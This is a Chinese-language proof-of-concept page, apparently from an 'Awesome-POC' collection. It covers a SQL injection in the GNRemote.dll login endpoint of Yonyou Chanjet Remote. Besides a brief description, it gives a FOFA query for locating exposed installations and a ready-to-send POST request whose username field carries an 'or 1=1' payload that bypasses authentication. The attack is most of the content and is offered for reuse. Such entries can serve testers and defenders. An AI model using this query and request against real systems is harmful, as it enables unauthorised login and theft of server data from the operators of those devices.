Awesome-POC/Web应用漏洞/用友 畅捷通远程通 GNRemote.dll SQL注入漏洞.md
2022-12-05 11:09:28 +08:00

35 lines
707 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 用友 畅捷通远程通 GNRemote.dll SQL注入漏洞
## 漏洞描述
用友 畅捷通远程通 GNRemote.dll SQL注入漏洞攻击者通过SQL注入可以获取服务器敏感信息或者使用万能密码登录设备
## 漏洞影响
```
用友 畅捷通远程通
```
## FOFA
```
body="远程通CHANJET_Remote"
```
## 漏洞复现
登录页面
![image-20221017171544062](./images/202210171715136.png)
验证POC
```
POST /GNRemote.dll?GNFunction=LoginServer&decorator=text_wrap&frombrowser=esl
username=%22'%20or%201%3d1%3b%22&password=%018d8cbc8bfc24f018&ClientStatus=1
```
![image-20221017171557552](./images/202210171715601.png)
![image-20221017171609942](./images/202210171716987.png)